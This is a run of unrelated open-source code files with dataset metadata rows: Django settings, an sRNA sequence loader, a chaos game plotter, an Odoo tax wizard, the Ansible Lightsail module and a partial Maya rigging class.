'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
CACHES = {
'default': {
'BACKEND': 'redis_cache.RedisCache',
'LOCATION': '192.168.199.8:6379',
'TIMEOUT': 3600,
'OPTIONS': {
'DB': 16,
'MAX_ENTRIES': 10000,
},
}
}
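# Hedged usage sketch of the cache configured above (the key name is
# illustrative, not part of the original settings):
#
#     from django.core.cache import cache
#     cache.set('analytics:last_run', '2014-01-01', timeout=3600)
#     last_run = cache.get('analytics:last_run')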
REDIS_HOST = '192.168.199.8'
REDIS_PORT = 6379
REDIS_DB = 16
import ConfigParser
from StringIO import StringIO
SERVER_CONF = ConfigParser.RawConfigParser()
try:
with open('server.conf', 'rb') as f:
content = f.read().decode('utf-8-sig').encode('utf8')
try:
SERVER_CONF.readfp(StringIO(content))
except ConfigParser.MissingSectionHeaderError:
content_str = "[default]\n" + content
SERVER_CONF.readfp(StringIO(content_str))
except IOError:
pass
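# Hedged usage sketch: after the "[default]" header is injected above,
# values can be read back with the standard ConfigParser API (the option
# name is illustrative, not known to exist in server.conf):
#
#     try:
#         REDIS_HOST = SERVER_CONF.get('default', 'redis_host')
#     except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
#         pass  # keep the defaults defined above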
# IMPORT LOCAL SETTINGS
# =====================
try:
from settings_local import *
except ImportError:
pass
|
apache-2.0
| 4,597,947,349,156,701,700 | 28.024272 | 127 | 0.662151 | false |
Carroll-Lab/scram
|
scram_modules/srnaseq.py
|
1
|
5630
|
'''
Small RNA storage class
Stores unique sequence and read count in an internal dictionary.
Automatic normalisation to RPMR once loaded from file
'''
from scram_modules.dna import DNA
import time
class SRNASeq(object):
def __init__(self):
self._internal_dict = {} # internal dictionary for class
def __setitem__(self, sequence, count):
self._internal_dict[sequence] = count # {sequence:count}
def __getitem__(self, sequence):
return self._internal_dict[sequence] # get count for sequence
def __iter__(self):
return iter(self._internal_dict.items()) # iterable
def __len__(self):
return len(self._internal_dict) # number of sequences stored
def __contains__(self, sequence):
return sequence in self._internal_dict # true if sequence stored
def sRNAs(self):
return self._internal_dict.keys() # returns a view of all sequences
def counts(self):
        return self._internal_dict.values()  # returns a view of all counts
def load_seq_file(self, seq_file, sRNA_max_len_cutoff, min_reads, sRNA_min_len_cutoff):
"""
Load collapsed FASTA sequence file
eg. >1-43456
AAAAAAATTTTTATATATATA
        Calculate RPMR (reads per million reads) and apply it during loading
:param seq_file: path/to/seq/file (str)
:param sRNA_max_len_cutoff: only reads of length <= sRNA_max_len_cutoff loaded (int)
:param min_reads: only reads >= min_reads count loaded (int)
:param sRNA_min_len_cutoff: only reads of length >= sRNA_min_len_cutoff loaded (int)
"""
start = time.clock()
_seq_dict = {}
read_count = self._single_seq_file_load(_seq_dict, min_reads, sRNA_max_len_cutoff, sRNA_min_len_cutoff,
seq_file)
        # final RPMR: scale each raw count to reads per million
        # (count * 1e6 / total reads) - could simplify in future
for sRNA, count in _seq_dict.items():
self._internal_dict[sRNA] = count * (float(1000000) / read_count)
print("\n{0} load time = {1} seconds for {2} reads".format(seq_file.split('/')[-1],
str((time.clock() - start)), read_count))
print("-" * 50)
def load_seq_file_arg_list(self, seq_file_arg_list, sRNA_max_len_cutoff,
min_reads, sRNA_min_len_cutoff):
"""
Load collapsed FASTA sequence files from the list - generate single SRNA_seq object with mean
eg. >1-43456
AAAAAAATTTTTATATATATA
        Calculate RPMR (reads per million reads) and apply it during loading
:param seq_file_arg_list: list of seq_file Paths [path/to/seq/file (str),.....] (list)
:param sRNA_max_len_cutoff: only reads of length <= sRNA_max_len_cutoff loaded (int)
:param min_reads: only reads >= min_reads count loaded (int)
:param sRNA_min_len_cutoff: only reads of length >= sRNA_min_len_cutoff loaded (int)
"""
start = time.clock()
# read_count_1 = 0
indv_seq_dict_list = [] # list of individual seq_dics
indv_seq_dict_list_factor = [] # RPMR for each seq. disc
for seq_file in seq_file_arg_list:
single_start = time.clock()
_seq_dict = {}
read_count = self._single_seq_file_load(_seq_dict, min_reads, sRNA_max_len_cutoff, sRNA_min_len_cutoff,
seq_file)
indv_seq_dict_list.append(_seq_dict)
indv_seq_dict_list_factor.append(float(1000000) / read_count)
print("\n{0} load time = {1} seconds for {2} reads".format(seq_file.split('/')[-1],
str((time.clock() - single_start)), read_count))
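        # Keep only sRNAs present in every replicate; the stored value is
        # the mean of the RPMR-normalised counts across replicates.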
for sRNA, count in indv_seq_dict_list[0].items():
if all(sRNA in d for d in indv_seq_dict_list):
total_count = 0
for i in range(len(indv_seq_dict_list)):
total_count += (indv_seq_dict_list[i][sRNA] * indv_seq_dict_list_factor[i])
self._internal_dict[sRNA] = total_count / len(indv_seq_dict_list)
print("\nTotal sequence file processing time = " \
+ str((time.clock() - start)) + " seconds\n")
print("-" * 50)
def _single_seq_file_load(self, _seq_dict, min_reads, sRNA_max_len_cutoff, sRNA_min_len_cutoff, seq_file):
"""
Internal class function for a single seq file load. No normalisation.
:param _seq_dict: class internal dict for loading collapsed fasta file {sRNA;count} (dict)
:param min_reads: only reads >= min_reads count loaded (int)
:param sRNA_max_len_cutoff: only reads of length <= sRNA_max_len_cutoff loaded (int)
:param sRNA_min_len_cutoff: only reads of length >= sRNA_min_len_cutoff loaded (int)
:param seq_file: path/to/seq/file (str)
:return: total read count for the file (inside of cutoffs) (int)
"""
read_count = 0
with open(seq_file, 'r') as loaded_seq:
next_line = False
for line in loaded_seq:
line = line.strip()
                if line.startswith('>'):
                    count = int(line.split('-')[1])
                    next_line = True
                elif next_line and count >= min_reads and sRNA_min_len_cutoff <= len(line) <= sRNA_max_len_cutoff:
_seq_dict[DNA(line)] = count
read_count += count
next_line = False
else:
pass
return read_count
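# Hedged usage sketch (the file path and cutoffs are illustrative):
#
#     srna = SRNASeq()
#     srna.load_seq_file('reads_collapsed.fa', 25, 1, 18)
#     for seq, rpmr in srna:
#         pass  # rpmr is the raw count normalised to reads per million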
|
mit
| 7,421,789,612,106,621,000 | 41.659091 | 119 | 0.561634 | false |
sergiohzlz/complejos
|
JdelC/jdelc.py
|
1
|
2211
|
#!/usr/bin/python
import numpy as np
import numpy.random as rnd
import sys
import matplotlib
matplotlib.use('TkAgg')
from matplotlib import pyplot as plt
from numpy import pi
poligono_p = lambda n,rot: [(1,i*2*np.pi/n+rot) for i in range(1,n+1)]
pol2cart = lambda ro,te: (ro*np.cos(te),ro*np.sin(te))
poligono_c = lambda L: [pol2cart(x[0],x[1]) for x in L]
genera_coords = lambda L,p: dict(zip(L,p))
pmedio = lambda x,y: (0.5*(x[0]+y[0]) , 0.5*(x[1]+y[1]) )
class JdelC(object):
def __init__(self):
pass
def juego(n,m=100000, rot=pi/2):
C = genera_coords(range(n), poligono_c(poligono_p(n,rot)))
P = [C[rnd.choice(range(n))]]
for i in range(m):
up = P[-1]
vz = C[rnd.choice(range(n))]
P.append(pmedio(up,vz))
return np.array(P), C
def juego_sec(V,S,m=100000,rot=pi/4):
n = len(V)
C = genera_coords(V, poligono_c(poligono_p(n,rot)))
P = [C[S[0]]]
for i in range(1,m):
up = P[-1]
vz = C[S[i]]
P.append(pmedio(up,vz))
return np.array(P), C
def secciones_nucleotidos(f,m):
cont=0
for r in f:
l = r.strip()
if(l[0]=='>'):
continue
acum = m-cont
sec = ''.join([ s for s in l[:acum] if s!='N' ])
cont+=len(sec)
if(cont<=m):
yield sec
def secciones(f,m):
cont=0
for r in f:
l = r.strip()
try:
if(l[0]=='>'):
continue
except:
continue
acum = m-cont
sec = ''.join([ s for s in l[:acum] ])
cont+=len(sec)
if(cont<=m):
yield sec
def grafica(R):
plt.scatter(R[:,0],R[:,1],s=0.1, c='k')
def grafcoords(*D):
R,C = D
plt.scatter(R[:,0],R[:,1],s=0.1, c='k')
for c in C:
plt.annotate(c,C[c])
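# Hedged usage sketch (a classic chaos game; the values are illustrative):
#
#     R, C = juego(3, m=50000)  # n=3 gives a Sierpinski-like figure
#     grafcoords(R, C)
#     plt.show()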
if __name__=='__main__':
    n = int(sys.argv[1])  # argv[0] is the script name, not an argument
# Ejemplo
# In [150]: G = open('Saccharomyces_cerevisiae_aa.fasta','r')
#
# In [151]: secs = jdelc.secciones(G,1000)
#
# In [152]: secuencia = ''
#
# In [153]: for sec in secs:
# ...: secuencia += sec
# ...:
#
# In [154]: R,C = jdelc.juego_sec(aminos,secuencia, len(secuencia),pi/4); jdelc.grafcoords(R,C); show()
|
gpl-2.0
| 6,357,678,241,620,429,000 | 23.032609 | 103 | 0.517413 | false |
akretion/l10n-brazil
|
l10n_br_account_product/models/wizard_account_product_fiscal_classification.py
|
1
|
4195
|
# -*- coding: utf-8 -*-
# Copyright (C) 2012 Renato Lima - Akretion
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from odoo import models, api
class WizardAccountProductFiscalClassification(models.TransientModel):
_inherit = 'wizard.account.product.fiscal.classification'
@api.multi
def action_create(self):
obj_tax = self.env['account.tax']
obj_tax_code = self.env['account.tax.code']
obj_tax_code_template = self.env['account.tax.code.template']
obj_tax_template = self.env['account.tax.template']
obj_fc = self.env['account.product.fiscal.classification']
obj_tax_purchase = self.env['l10n_br_tax.definition.purchase']
obj_tax_sale = self.env['l10n_br_tax.definition.sale']
obj_fc_template = self.env[
'account.product.fiscal.classification.template']
def map_taxes_codes(tax_definition, tax_type='sale'):
for line in tax_definition:
for company in companies:
if company_taxes[company].get(line.tax_template_id.id):
tax_def_domain = [
('tax_id', '=', company_taxes[
company].get(line.tax_template_id.id)),
('fiscal_classification_id', '=', fc_id.id),
('company_id', '=', company)]
if tax_type == 'sale':
obj_tax_def = obj_tax_sale
else:
obj_tax_def = obj_tax_purchase
tax_def_result = obj_tax_def.search(tax_def_domain)
values = {
'tax_id': company_taxes[company].get(
line.tax_template_id.id),
'tax_code_id': company_codes[company].get(
line.tax_code_template_id.id),
'company_id': company,
'fiscal_classification_id': fc_id.id,
}
if tax_def_result:
tax_def_result.write(values)
else:
obj_tax_def.create(values)
return True
company_id = self.company_id.id
companies = []
if company_id:
companies.append(company_id)
else:
companies = self.env['res.company'].sudo().search([]).ids
company_taxes = {}
company_codes = {}
for company in companies:
company_taxes[company] = {}
company_codes[company] = {}
for tax in obj_tax.sudo().search([('company_id', '=', company)]):
tax_template = obj_tax_template.search(
[('name', '=', tax.name)])
if tax_template:
company_taxes[company][tax_template[0].id] = tax.id
for code in obj_tax_code.sudo().search(
[('company_id', '=', company)]):
code_template = obj_tax_code_template.search(
[('name', '=', code.name)])
if code_template:
company_codes[company][code_template[0].id] = code.id
for fc_template in obj_fc_template.search([]):
fc_id = obj_fc.search([('name', '=', fc_template.name)])
if not fc_id:
vals = {
'active': fc_template.active,
'code': fc_template.code,
'name': fc_template.name,
'description': fc_template.description,
'company_id': company_id,
'type': fc_template.type,
'note': fc_template.note,
'inv_copy_note': fc_template.inv_copy_note,
}
fc_id = obj_fc.sudo().create(vals)
map_taxes_codes(fc_template.sale_tax_definition_line,
'sale')
map_taxes_codes(fc_template.purchase_tax_definition_line,
'purchase')
return True
|
agpl-3.0
| -2,054,643,602,962,127,600 | 36.455357 | 77 | 0.476996 | false |
jbenden/ansible
|
lib/ansible/modules/cloud/amazon/lightsail.py
|
1
|
15824
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.0'}
DOCUMENTATION = '''
---
module: lightsail
short_description: Create or delete a virtual machine instance in AWS Lightsail
description:
    - Creates or deletes instances in AWS Lightsail and optionally waits for them to be 'running'.
version_added: "2.4"
author: "Nick Ball (@nickball)"
options:
state:
description:
- Indicate desired state of the target.
default: present
choices: ['present', 'absent', 'running', 'restarted', 'stopped']
name:
description:
- Name of the instance
required: true
default : null
zone:
description:
- AWS availability zone in which to launch the instance. Required when state='present'
required: false
default: null
blueprint_id:
description:
- ID of the instance blueprint image. Required when state='present'
required: false
default: null
bundle_id:
description:
- Bundle of specification info for the instance. Required when state='present'
required: false
default: null
user_data:
description:
- Launch script that can configure the instance with additional data
required: false
default: null
key_pair_name:
description:
- Name of the key pair to use with the instance
required: false
default: null
wait:
description:
- Wait for the instance to be in state 'running' before returning. If wait is "no" an ip_address may not be returned
default: "yes"
choices: [ "yes", "no" ]
wait_timeout:
description:
- How long before wait gives up, in seconds.
default: 300
requirements:
- "python >= 2.6"
- boto3
extends_documentation_fragment: aws
'''
EXAMPLES = '''
# Create a new Lightsail instance, register the instance details
- lightsail:
state: present
name: myinstance
region: us-east-1
zone: us-east-1a
blueprint_id: ubuntu_16_04
bundle_id: nano_1_0
key_pair_name: id_rsa
user_data: " echo 'hello world' > /home/ubuntu/test.txt"
wait_timeout: 500
register: my_instance
- debug:
msg: "Name is {{ my_instance.instance.name }}"
- debug:
msg: "IP is {{ my_instance.instance.publicIpAddress }}"
# Delete an instance if present
- lightsail:
state: absent
region: us-east-1
name: myinstance
'''
RETURN = '''
changed:
description: if a snapshot has been modified/created
returned: always
type: bool
sample:
changed: true
instance:
description: instance data
returned: always
type: dict
sample:
arn: "arn:aws:lightsail:us-east-1:448830907657:Instance/1fef0175-d6c8-480e-84fa-214f969cda87"
blueprint_id: "ubuntu_16_04"
blueprint_name: "Ubuntu"
bundle_id: "nano_1_0"
created_at: "2017-03-27T08:38:59.714000-04:00"
hardware:
cpu_count: 1
ram_size_in_gb: 0.5
is_static_ip: false
location:
availability_zone: "us-east-1a"
region_name: "us-east-1"
name: "my_instance"
networking:
monthly_transfer:
gb_per_month_allocated: 1024
ports:
- access_direction: "inbound"
access_from: "Anywhere (0.0.0.0/0)"
access_type: "public"
common_name: ""
from_port: 80
protocol: tcp
to_port: 80
- access_direction: "inbound"
access_from: "Anywhere (0.0.0.0/0)"
access_type: "public"
common_name: ""
from_port: 22
protocol: tcp
to_port: 22
private_ip_address: "172.26.8.14"
public_ip_address: "34.207.152.202"
resource_type: "Instance"
ssh_key_name: "keypair"
state:
code: 16
name: running
support_code: "588307843083/i-0997c97831ee21e33"
username: "ubuntu"
'''
import time
import traceback
try:
import botocore
HAS_BOTOCORE = True
except ImportError:
HAS_BOTOCORE = False
try:
import boto3
except ImportError:
# will be caught by imported HAS_BOTO3
pass
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import (ec2_argument_spec, get_aws_connection_info, boto3_conn,
HAS_BOTO3, camel_dict_to_snake_dict)
def create_instance(module, client, instance_name):
"""
Create an instance
module: Ansible module object
client: authenticated lightsail connection object
instance_name: name of instance to delete
Returns a dictionary of instance information
about the new instance.
"""
changed = False
# Check if instance already exists
inst = None
try:
inst = _find_instance_info(client, instance_name)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != 'NotFoundException':
module.fail_json(msg='Error finding instance {0}, error: {1}'.format(instance_name, e))
zone = module.params.get('zone')
blueprint_id = module.params.get('blueprint_id')
bundle_id = module.params.get('bundle_id')
key_pair_name = module.params.get('key_pair_name')
user_data = module.params.get('user_data')
user_data = '' if user_data is None else user_data
resp = None
if inst is None:
try:
resp = client.create_instances(
instanceNames=[
instance_name
],
availabilityZone=zone,
blueprintId=blueprint_id,
bundleId=bundle_id,
userData=user_data,
keyPairName=key_pair_name,
)
resp = resp['operations'][0]
except botocore.exceptions.ClientError as e:
module.fail_json(msg='Unable to create instance {0}, error: {1}'.format(instance_name, e))
changed = True
inst = _find_instance_info(client, instance_name)
return (changed, inst)
def delete_instance(module, client, instance_name):
"""
Terminates an instance
module: Ansible module object
client: authenticated lightsail connection object
instance_name: name of instance to delete
Returns a dictionary of instance information
about the instance deleted (pre-deletion).
If the instance to be deleted is running
"changed" will be set to False.
"""
# It looks like deleting removes the instance immediately, nothing to wait for
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
wait_max = time.time() + wait_timeout
changed = False
inst = None
try:
inst = _find_instance_info(client, instance_name)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != 'NotFoundException':
module.fail_json(msg='Error finding instance {0}, error: {1}'.format(instance_name, e))
# Wait for instance to exit transition state before deleting
if wait:
while wait_max > time.time() and inst is not None and inst['state']['name'] in ('pending', 'stopping'):
try:
time.sleep(5)
inst = _find_instance_info(client, instance_name)
except botocore.exceptions.ClientError as e:
                if e.response['ResponseMetadata']['HTTPStatusCode'] == 403:
module.fail_json(msg="Failed to delete instance {0}. Check that you have permissions to perform the operation.".format(instance_name),
exception=traceback.format_exc())
elif e.response['Error']['Code'] == "RequestExpired":
module.fail_json(msg="RequestExpired: Failed to delete instance {0}.".format(instance_name), exception=traceback.format_exc())
# sleep and retry
time.sleep(10)
# Attempt to delete
if inst is not None:
while not changed and ((wait and wait_max > time.time()) or (not wait)):
try:
client.delete_instance(instanceName=instance_name)
changed = True
except botocore.exceptions.ClientError as e:
module.fail_json(msg='Error deleting instance {0}, error: {1}'.format(instance_name, e))
# Timed out
if wait and not changed and wait_max <= time.time():
module.fail_json(msg="wait for instance delete timeout at %s" % time.asctime())
return (changed, inst)
def restart_instance(module, client, instance_name):
"""
Reboot an existing instance
module: Ansible module object
client: authenticated lightsail connection object
instance_name: name of instance to reboot
Returns a dictionary of instance information
about the restarted instance
If the instance was not able to reboot,
"changed" will be set to False.
Wait will not apply here as this is an OS-level operation
"""
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
wait_max = time.time() + wait_timeout
changed = False
inst = None
try:
inst = _find_instance_info(client, instance_name)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != 'NotFoundException':
module.fail_json(msg='Error finding instance {0}, error: {1}'.format(instance_name, e))
# Wait for instance to exit transition state before state change
if wait:
while wait_max > time.time() and inst is not None and inst['state']['name'] in ('pending', 'stopping'):
try:
time.sleep(5)
inst = _find_instance_info(client, instance_name)
except botocore.exceptions.ClientError as e:
                if e.response['ResponseMetadata']['HTTPStatusCode'] == 403:
module.fail_json(msg="Failed to restart instance {0}. Check that you have permissions to perform the operation.".format(instance_name),
exception=traceback.format_exc())
elif e.response['Error']['Code'] == "RequestExpired":
module.fail_json(msg="RequestExpired: Failed to restart instance {0}.".format(instance_name), exception=traceback.format_exc())
time.sleep(3)
# send reboot
if inst is not None:
try:
client.reboot_instance(instanceName=instance_name)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != 'NotFoundException':
module.fail_json(msg='Unable to reboot instance {0}, error: {1}'.format(instance_name, e))
changed = True
return (changed, inst)
def startstop_instance(module, client, instance_name, state):
"""
Starts or stops an existing instance
module: Ansible module object
client: authenticated lightsail connection object
instance_name: name of instance to start/stop
state: Target state ("running" or "stopped")
Returns a dictionary of instance information
about the instance started/stopped
If the instance was not able to state change,
"changed" will be set to False.
"""
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
wait_max = time.time() + wait_timeout
changed = False
inst = None
try:
inst = _find_instance_info(client, instance_name)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != 'NotFoundException':
module.fail_json(msg='Error finding instance {0}, error: {1}'.format(instance_name, e))
# Wait for instance to exit transition state before state change
if wait:
while wait_max > time.time() and inst is not None and inst['state']['name'] in ('pending', 'stopping'):
try:
time.sleep(5)
inst = _find_instance_info(client, instance_name)
except botocore.exceptions.ClientError as e:
                if e.response['ResponseMetadata']['HTTPStatusCode'] == 403:
module.fail_json(msg="Failed to start/stop instance {0}. Check that you have permissions to perform the operation".format(instance_name),
exception=traceback.format_exc())
elif e.response['Error']['Code'] == "RequestExpired":
module.fail_json(msg="RequestExpired: Failed to start/stop instance {0}.".format(instance_name), exception=traceback.format_exc())
time.sleep(1)
# Try state change
if inst is not None and inst['state']['name'] != state:
try:
if state == 'running':
client.start_instance(instanceName=instance_name)
else:
client.stop_instance(instanceName=instance_name)
except botocore.exceptions.ClientError as e:
module.fail_json(msg='Unable to change state for instance {0}, error: {1}'.format(instance_name, e))
changed = True
# Grab current instance info
inst = _find_instance_info(client, instance_name)
return (changed, inst)
def core(module):
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
if not region:
module.fail_json(msg='region must be specified')
client = None
try:
client = boto3_conn(module, conn_type='client', resource='lightsail',
region=region, endpoint=ec2_url, **aws_connect_kwargs)
except (botocore.exceptions.ClientError, botocore.exceptions.ValidationError) as e:
module.fail_json('Failed while connecting to the lightsail service: %s' % e, exception=traceback.format_exc())
changed = False
state = module.params['state']
name = module.params['name']
if state == 'absent':
changed, instance_dict = delete_instance(module, client, name)
elif state in ('running', 'stopped'):
changed, instance_dict = startstop_instance(module, client, name, state)
elif state == 'restarted':
changed, instance_dict = restart_instance(module, client, name)
elif state == 'present':
changed, instance_dict = create_instance(module, client, name)
module.exit_json(changed=changed, instance=camel_dict_to_snake_dict(instance_dict))
def _find_instance_info(client, instance_name):
''' handle exceptions where this function is called '''
inst = None
try:
inst = client.get_instance(instanceName=instance_name)
except botocore.exceptions.ClientError as e:
raise
return inst['instance']
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
name=dict(type='str', required=True),
state=dict(type='str', default='present', choices=['present', 'absent', 'stopped', 'running', 'restarted']),
zone=dict(type='str'),
blueprint_id=dict(type='str'),
bundle_id=dict(type='str'),
key_pair_name=dict(type='str'),
user_data=dict(type='str'),
wait=dict(type='bool', default=True),
wait_timeout=dict(default=300),
))
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO3:
module.fail_json(msg='Python module "boto3" is missing, please install it')
if not HAS_BOTOCORE:
module.fail_json(msg='Python module "botocore" is missing, please install it')
try:
core(module)
except (botocore.exceptions.ClientError, Exception) as e:
module.fail_json(msg=str(e), exception=traceback.format_exc())
if __name__ == '__main__':
main()
|
gpl-3.0
| 8,156,596,528,285,752,000 | 32.525424 | 157 | 0.63132 | false |
Shadowtags/ModularRiggingTool
|
nwModularRiggingTool/Modules/System/controlModule.py
|
1
|
13045
|
import pymel.core as pm
import System.utils as utils
reload(utils)
from functools import partial
class ControlModule:
def __init__(self, _moduleNamespace):
# Class variables
self.moduleContainer = None
self.blueprintNamespace = ''
self.moduleNamespace = ''
self.characterNamespace = ''
self.publishedNames = []
if _moduleNamespace == None:
return
# Break down namespace info for easy access
moduleNamespaceInfo = utils.StripAllNamespaces(_moduleNamespace)
self.blueprintNamespace = moduleNamespaceInfo[0]
self.moduleNamespace = moduleNamespaceInfo[1]
self.characterNamespace = utils.StripLeadingNamespace(self.blueprintNamespace)[0]
self.moduleContainer = "%s:%s:module_container" %(self.blueprintNamespace, self.moduleNamespace)
# DERIVED CLASS METHODS
def Install_custom(self, _joints, _moduleGrp, _moduleContainer):
print "Install_custom() method not implemented bt derived module"
def CompatibleBlueprintModules(self):
return ("-1")
def UI(self, _parentLayout):
print "No custom user interface provided"
def UI_preferences(self, _parentLayout):
print "No custom user interface provided"
def Match(self, *args):
print "No matching functionality provided"
# BASE CLASS METHODS
def Install(self):
nodes = self.Install_init()
joints = nodes[0]
moduleGrp = nodes[1]
moduleContainer = nodes[2]
self.Install_custom(joints, moduleGrp, moduleContainer)
self.Install_finalize()
def Install_init(self):
pm.namespace(setNamespace = self.blueprintNamespace)
pm.namespace(add = self.moduleNamespace)
pm.namespace(setNamespace = ":")
characterContainer = "%s:character_container" %self.characterNamespace
blueprintContainer = "%s:module_container" %self.blueprintNamespace
container = [characterContainer, blueprintContainer]
for c in container:
pm.lockNode(c, lock = False, lockUnpublished = False)
self.joints = self.DuplicateAndRenameCreationPose()
moduleJointsGrp = self.joints[0]
moduleGrp = pm.group(empty = True, name = "%s:%s:module_grp" %(self.blueprintNamespace, self.moduleNamespace))
hookIn = "%s:HOOK_IN" %self.blueprintNamespace
pm.parent(moduleGrp, hookIn, relative = True)
pm.parent(moduleJointsGrp, moduleGrp, absolute = True)
pm.select(moduleGrp, replace = True)
pm.addAttr(attributeType = "float", longName = "iconScale", minValue = 0.001, softMaxValue = 10.0, defaultValue = 1.0, keyable = True)
pm.setAttr("%s.overrideEnabled" %moduleGrp, 1)
pm.setAttr("%s.overrideColor" %moduleGrp, 6)
utilityNodes = self.SetupBlueprintWeightBasedBlending()
self.SetupModuleVisibility(moduleGrp)
containedNodes = []
containedNodes.extend(self.joints)
containedNodes.append(moduleGrp)
containedNodes.extend(utilityNodes)
self.moduleContainer = pm.container(name = self.moduleContainer)
utils.AddNodeToContainer(self.moduleContainer, containedNodes, True)
utils.AddNodeToContainer(blueprintContainer, self.moduleContainer)
index = 0
for joint in self.joints:
if index > 0:
niceJointName = utils.StripAllNamespaces(joint)[1]
self.PublishNameToModuleContainer("%s.rotate" %joint, "%s_R" %niceJointName, False)
index += 1
self.PublishNameToModuleContainer("%s.levelOfDetail" %moduleGrp, "Control_LOD")
self.PublishNameToModuleContainer("%s.iconScale" %moduleGrp, "Icon_Scale")
self.PublishNameToModuleContainer("%s.overrideColor" %moduleGrp, "Icon_Color")
self.PublishNameToModuleContainer("%s.visibility" %moduleGrp, "Visibility", False)
return (self.joints, moduleGrp, self.moduleContainer)
def Install_finalize(self):
self.PublishModuleContainerNamesToOuterContainers()
pm.setAttr("%s:blueprint_joints_grp.controlModulesInstalled" %self.blueprintNamespace, True)
characterContainer = "%s:character_container" %self.characterNamespace
blueprintContainer = "%s:module_container" %self.blueprintNamespace
containers = [characterContainer, blueprintContainer, self.moduleContainer]
for c in containers:
pm.lockNode(c, lock = True, lockUnpublished = True)
def DuplicateAndRenameCreationPose(self):
joints = pm.duplicate("%s:creationPose_joints_grp" %self.blueprintNamespace, renameChildren = True)
pm.select(joints, hierarchy = True)
joints = pm.ls(selection = True)
for i in range(len(joints)):
nameSuffix = joints[i].rpartition("creationPose_")[2]
joints[i] = pm.rename(joints[i], "%s:%s:%s" %(self.blueprintNamespace, self.moduleNamespace, nameSuffix))
return joints
def SetupBlueprintWeightBasedBlending(self):
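        # Blends this module's joint transforms into the blueprint joints:
        # a per-module weight attribute on the SETTINGS locator scales each
        # joint's rotation/translation/scale before it is summed into the
        # blueprint joint's add* utility nodes.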
settingsLocator = "%s:SETTINGS" %self.blueprintNamespace
attributes = pm.listAttr(settingsLocator, keyable = False)
weightAttributes = []
for attr in attributes:
if attr.find("_weight") != -1:
weightAttributes.append(attr)
value = 0
if len(weightAttributes) == 0:
value = 1
pm.setAttr("%s.creationPoseWeight" %settingsLocator, 0)
pm.select(settingsLocator, replace = True)
weightAttributeName = "%s_weight" %self.moduleNamespace
pm.addAttr(longName = weightAttributeName, attributeType = "double", minValue = 0, maxValue = 1, defaultValue = value, keyable = False)
pm.container("%s:module_container" %self.blueprintNamespace, edit = True, publishAndBind = ["%s.%s" %(settingsLocator, weightAttributeName), weightAttributeName])
currentEntries = pm.attributeQuery("activeModule", node = settingsLocator, listEnum = True)
newEntry = self.moduleNamespace
if currentEntries[0] == "None":
pm.addAttr("%s.activeModule" %settingsLocator, edit = True, enumName = newEntry)
pm.setAttr("%s.activeModule" %settingsLocator, 0)
else:
pm.addAttr("%s.activeModule" %settingsLocator, edit = True, enumName = "%s:%s" %(currentEntries[0], newEntry))
utilityNodes = []
for i in range(1, len(self.joints)):
joint = self.joints[i]
nameSuffix = utils.StripAllNamespaces(joint)[1]
blueprintJoint = "%s:blueprint_%s" %(self.blueprintNamespace, nameSuffix)
weightNodeAttr = "%s.%s" %(settingsLocator, weightAttributeName)
if i < len(self.joints) - 1 or len(self.joints) == 2:
multiplyRotations = pm.shadingNode("multiplyDivide", name = "%s_multiplyRotationsWeight" %joint, asUtility = True)
utilityNodes.append(multiplyRotations)
pm.connectAttr("%s.rotate" %joint, "%s.input1" %multiplyRotations, force = True)
for attr in ["input2X", "input2Y", "input2Z"]:
pm.connectAttr(weightNodeAttr, "%s.%s" %(multiplyRotations, attr), force = True)
index = utils.FindFirstFreeConnection("%s_addRotations.input3D" %blueprintJoint)
pm.connectAttr("%s.output" %multiplyRotations, "%s_addRotations.input3D[%d]" %(blueprintJoint, index), force = True)
if i == 1:
addNode = "%s_addTranslate" %blueprintJoint
if pm.objExists(addNode):
multiplyTranslation = pm.shadingNode("multiplyDivide", name = "%s_multiplyTranslationWeight" %joint, asUtility = True)
utilityNodes.append(multiplyTranslation)
pm.connectAttr("%s.translate" %joint, "%s.input1" %multiplyTranslation, force = True)
for attr in ["input2X", "input2Y", "input2Z"]:
pm.connectAttr(weightNodeAttr, "%s.%s" %(multiplyTranslation, attr), force = True)
index = utils.FindFirstFreeConnection("%s.input3D" %addNode)
pm.connectAttr("%s.output" %multiplyTranslation, "%s.input3D[%d]" %(addNode, index), force = True)
addNode = "%s_addScale" %blueprintJoint
if pm.objExists(addNode):
multiplyScale = pm.shadingNode("multiplyDivide", name = "%s_multiplyScaleWeight" %joint, asUtility = True)
utilityNodes.append(multiplyScale)
pm.connectAttr("%s.scale" %joint, "%s.input1" %multiplyScale, force = True)
for attr in ["input2X", "input2Y", "input2Z"]:
pm.connectAttr(weightNodeAttr, "%s.%s" %(multiplyScale, attr), force = True)
index = utils.FindFirstFreeConnection("%s.input3D" %addNode)
pm.connectAttr("%s.output" %multiplyScale, "%s.input3D[%d]" %(addNode, index), force = True)
else:
multiplyTranslation = pm.shadingNode("multiplyDivide", name = "%s_multiplyTranslationWeight" %joint, asUtility = True)
utilityNodes.append(multiplyTranslation)
pm.connectAttr("%s.translateX" %joint, "%s.input1X" %multiplyTranslation, force = True)
pm.connectAttr(weightNodeAttr, "%s.input2X" %multiplyTranslation, force = True)
addNode = "%s_addTx" %blueprintJoint
index = utils.FindFirstFreeConnection("%s.input1D" %addNode)
